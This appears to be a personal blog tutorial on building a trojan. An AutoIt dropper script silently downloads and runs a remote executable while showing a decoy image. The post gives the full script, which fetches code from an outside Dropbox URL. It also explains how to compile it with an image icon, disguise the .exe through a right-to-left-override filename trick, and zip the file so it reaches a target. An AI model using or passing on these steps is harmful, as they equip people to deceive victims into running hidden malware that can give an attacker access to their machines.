A Trojan horse (or Trojan) is one of the most common and dangerous types of threats that can infect your computer or mobile device.
What is trojan malware?
Trojan malware, when opened appears to be a legitimate file opened by the user like opening an image or a document or playing a media file, but in the background, it will run some evil process like someone may be gaining access to your computer through a backdoor or injecting some other harmful code.
Creating my trojan malware
In this blog, I will show you how I combined my executable file with an image file, and when opened, it was able to display the image when a target person opened it, but at the same time, the executable ran in the background. In simple words, I hid my .exe file in a .jpg image file.
This method can be extended to any file type like image, pdf, music, and so on. The executable in most cases is a virus or a backdoor used to gain access to the target computer. Let’s look at the steps:
1. Get a direct URL for the image and the .exe file
The .exe the executable file needs to be present on a publicly available URL from where it is directly downloaded by the browser. I have uploaded the executable on dropbox for this purpose. In the case of dropbox, modifying the end part of the sharable link to dl=1 will allow the browser to directly download the file. The link I have shared below does not contain any code and is actually an empty file, so it is safe for you to test the behavior of this link.
URL for the .exe executable: https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1
Image of a sports complex
I have used the image of the sports complex as a cover.
2. Using the URLs in a script
#include <StaticConstants.au3> #include <WindowsConstants.au3>
Local $urls = "url1,url2"
Local $urlsArray = StringSplit($urls, ",", 2 )
For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile)
Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
In the above code, in line number 3, replace url1 with the URL of the image and url2 with the URL of the executable file. My final code looks like this
#include <StaticConstants.au3> #include <WindowsConstants.au3> Local $urls = "https://images.adsttc.com/media/images/5b04/5e3a/f197/cc1f/9600/00aa/newsletter/park_garden_concourse.jpg,https://www.dropbox.com/s/hsnvw0ik1em0637/some_evil_file.exe?dl=1" Local $urlsArray = StringSplit($urls, ",", 2 ) For $url In $urlsArray $sFile = _DownloadFile($url) shellExecute($sFile) Next Func _DownloadFile($sURL) Local $hDownload, $sFile $sFile = StringRegExpReplace($sURL, "^.*/", "") $sDirectory = @TempDir & $sFile $hDownload = InetGet($sURL, $sDirectory, 17, 1) InetClose($hDownload) Return $sDirectory EndFunc ;==>_GetURLImage
Save the file with an extension .au3 . I have named the file trojan.au3 .
3. Creating an icon for the file
Since I am using an image as a cover file, Windows usually shows the thumbnail of the image as a file icon, so I will use the sports complex image as an icon and convert it to .ico format. You can google for it and you will find a number of tools to do it. I used this website for it – https://cloudconvert.com/jpg-to-ico
4. Compiling the script
The script is written in a scripting language called AutoIt . To install AutoIt in Ubuntu, you can install wine and install AutoIt , or if you want a straightforward way, install Veil from the steps mentioned here https://www.javatpoint.com/installing-veil. AutoIt will be installed in one of the steps after which you can exit the installation.
Open the Compile AutoIt app. The window should look something like the box shown below. Enter the location of the trojan.au3 file and the path of the .ico file.
The converted file looks like this on a windows machine.
Well, something’s not right. The problem with this file is its extension. It is obvious that is an executable since its extension is .exe . We need to spoof this extension.
5. Spoofing ‘.exe’ extension to any extension
To spoof the obvious extension .exe and replace it with .jpeg , we will use a right-to-left-override character.
To know about the detail of how spoofing actually works and where to place the right-to-left-override character, read the blog.
To summarise the steps mentioned in the above blog:
Rename trojan.exe to trojangpj.exe .
Paste the right-to-left-override character at the 7th position after trojan. All the characters after the right-to-left-override the character will be flipped i.e read right to left.
The filename now looks like trojanexe.jpg
Since the image contained in the file is of a sports complex I will replace trojan in the name with sportscompl_ so that the file name reads sports_complexe.jpg .
Congrats!!! The trojan is ready.
Now the filename matches with the image contained. Some recent browsers remove the right-to-left-override before downloading. So it is a good idea to zip the file and send it over.
This blog was originally published in the personal blog website of Gourav : https://gourav-dhar.com